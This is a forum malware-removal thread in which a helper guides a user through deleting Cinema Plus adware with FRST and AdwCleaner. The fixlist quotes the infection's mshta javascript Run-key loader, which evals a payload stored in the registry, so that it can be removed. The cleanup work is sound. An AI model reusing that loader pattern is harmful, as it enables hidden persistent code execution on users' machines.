system
July 13, 2015, 1:57pm
1
Somehow a pesky Cinema Plus V07.07 found it’s way onto my computer, however when I try to uninstall it opens a window saying that I can uninstall and buy some other software, the “just uninstall” tiny text does nothing when I click on it. I’ve ran Grime Fighter and Clean up which has helped a lot but does not remove this programme. I tried uninstalling in Safe Mode and it did nothing - any pointers on how to remove this pesky programme would be much appreciated!
Many thanks
Rebecca
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note : You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
[*]It will produce a log called FRST.txt in the same directory the tool is run from.
[*]Please attach both logs generated.
system
July 13, 2015, 2:05pm
3
Ok thanks - file attached
Hi this looks like something new, so when you have completed the fix could I have a fresh FRST scan please
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [gmsd_gb_005010023] => [X]
HKLM-x32\...\Run: [**b5ece8a9<*>] => mshta javascript:Mml0EpM="a";w9N=new%20ActiveXObject("WScript.Shell");azsWhPH9c="GA";D2TB8V=w9N.RegRead("HKLM\\software\\Wow6432Node\\817f9077\\9364e27d");FVT2p8EbN="6SEkU";eval(D2TB8V);eVBVxi05w="189 (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [gmsd_gb_002030026] => [X]
HKU\S-1-5-18\...\Run: [**b5ece8a9<*>] => mshta javascript:UOTG80XHy="A";o8j=new%20ActiveXObject("WScript.Shell");BR3ISZB4="Wx2yMPvE";rbJM9=o8j.RegRead("HKCU\\software\\817f9077\\9364e27d");lv6ddkj="8IUKMkeA";eval(rbJM9);uEFdzI8="inNiyXLQr"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2193330594-1523224260-2583000878-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=55&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&SSPV=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=58&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File
S4 zejytose; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\jnsh73EE.tmp [199168 2015-07-10] () [File not signed]
S4 nosepoze; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\knsc563B.tmpfs [X]
R1 {699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64; C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys [48784 2015-07-12] (StdLib)
S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X]
2015-07-13 13:35 - 2015-07-13 13:35 - 00002476 _____ C:\Users\magicbrew\Desktop\Reimage2.lnk
2015-07-13 13:10 - 2015-07-12 22:00 - 00048784 _____ (StdLib) C:\Windows\system32\Drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
2015-07-13 09:41 - 2015-07-13 09:52 - 00089365 _____ C:\ProgramData\L3553OBf.dat
2015-07-10 16:42 - 2015-07-13 13:02 - 00000000 ____D C:\Program Files (x86)\gmsd_gb_002030026
2015-07-10 16:42 - 2015-07-10 16:42 - 00003118 _____ C:\Windows\System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8}
2015-07-10 10:26 - 2015-07-13 09:41 - 00000000 ____D C:\ProgramData\abc
2015-07-07 17:35 - 2015-07-13 12:35 - 00000000 ____D C:\Program Files (x86)\CinemaPlus-3.2cV07.07
2015-07-07 17:35 - 2015-07-13 09:44 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Users\magicbrew\AppData\Local\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\c715af32-1dba-4665-97b0-d821aa5cac1c
2015-07-07 17:34 - 2015-07-13 12:34 - 00000000 ____D C:\Program Files (x86)\Coupoon
2015-07-07 17:34 - 2015-07-07 17:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\Crossbrowse
2015-07-07 17:33 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\SmartWeb
2015-07-07 17:29 - 2015-07-07 17:29 - 00000000 ____D C:\Users\magicbrew\Documents\Any Video Converter
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\Anvsoft
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2015-07-07 17:28 - 2015-07-07 17:28 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\OpenCandy
2015-07-07 17:20 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58
2015-07-07 16:42 - 2015-07-07 16:42 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieUserList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieSiteList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieBrowserModeList
2014-12-02 12:21 - 2014-12-02 12:21 - 0000037 ___SH () C:\Users\magicbrew\AppData\Roaming\3491672254e498b9d1dc6f1.41918858
2015-07-13 09:41 - 2015-07-13 09:52 - 0089365 _____ () C:\ProgramData\L3553OBf.dat
Task: {15011F61-317C-4C6E-B9CC-BE3D69FC7EF6} - \0be795aa-89f8-4c7a-9398-1041b523595d-7 No Task File <==== ATTENTION
Task: {1BD5DD3B-034C-404D-A865-43F5A9A3D8A4} - System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} => pcalua.exe -a C:\PROGRA~2\SearchProtect\Main\bin\uninstall.exe -c /S <==== ATTENTION
Task: {1C675159-F615-4178-BDA2-661B02F80695} - \0be795aa-89f8-4c7a-9398-1041b523595d-10_user No Task File <==== ATTENTION
Task: {3698927B-EA05-4575-B552-EB753A7B98DF} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-6 No Task File <==== ATTENTION
Task: {3D338D15-AA7D-44DD-9AA0-372968117ACD} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-7 No Task File <==== ATTENTION
Task: {3DB89CD6-34E7-41C7-8229-546728E14DB5} - \CreateChoiceProcessTask No Task File <==== ATTENTION
Task: {42D26C8B-DD80-462E-98D8-DA6D742BC71E} - \0be795aa-89f8-4c7a-9398-1041b523595d-3 No Task File <==== ATTENTION
Task: {9F0B38CD-7EBC-4491-9456-2FC16171043E} - \0be795aa-89f8-4c7a-9398-1041b523595d-5 No Task File <==== ATTENTION
Task: {A02824C8-9D89-4F64-92EF-547A9C0616DC} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe <==== ATTENTION
Task: {A6AF9D85-7F9A-476D-95F0-49FC3D51711D} - \0be795aa-89f8-4c7a-9398-1041b523595d-5_user No Task File <==== ATTENTION
Task: {E6C0A9FE-C0BF-4860-A45E-1701C67BC76B} - \PC SpeedUp Service Deactivator No Task File <==== ATTENTION
Task: {F0E841B2-7008-49CC-B4ED-BE8F5F76A920} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe <==== ATTENTION
Task: {F1D93A0E-ED45-4FF7-8D26-42E20408A045} - \0be795aa-89f8-4c7a-9398-1041b523595d-6 No Task File <==== ATTENTION
Task: {FAC3FEDE-18BE-498C-B23D-0E6CD1ADF476} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:QcOdGCxHYBG4TkN7XblHwOl03ccj
AlternateDataStreams: C:\ProgramData\Microsoft:tXBgMqmC0uFWziwQrJ5GM6A7Ouis
AlternateDataStreams: C:\ProgramData\PACE:769ABF6D611ED68D
AlternateDataStreams: C:\Users\magicbrew\Cookies:gv1yIDMJyN4dl5RY
AlternateDataStreams: C:\Users\magicbrew\Cookies:L0LGLDSGlbNUjxSPWvA8KYn9jt
AlternateDataStreams: C:\Users\magicbrew\Local Settings:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\Local Settings:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\hPkIakbtz61q:Zk0qrQeyENrPfsOIfIT1vtF
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temp:W7sJktx3CgzjNuxON43o9
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:gI0Cm4QLLW8Ky07opwOnfQ
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:z6zlAqiYS6ilphADGZa
C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt , in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Please download AdwCleaner by Xplode onto your desktop.
[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan .
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok .
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.
system
July 14, 2015, 9:38am
6
I think that’s done the trick - the programme has gone! Thank you so much!!
OK I would like to look at the registry keys referenced to ensure that they are safe for me to remove
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
Reg: reg query "HKCU\software\817f9077"
Reg: reg query "HKLM\software\Wow6432Node\817f9077"
Save this as fixlist.txt , in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that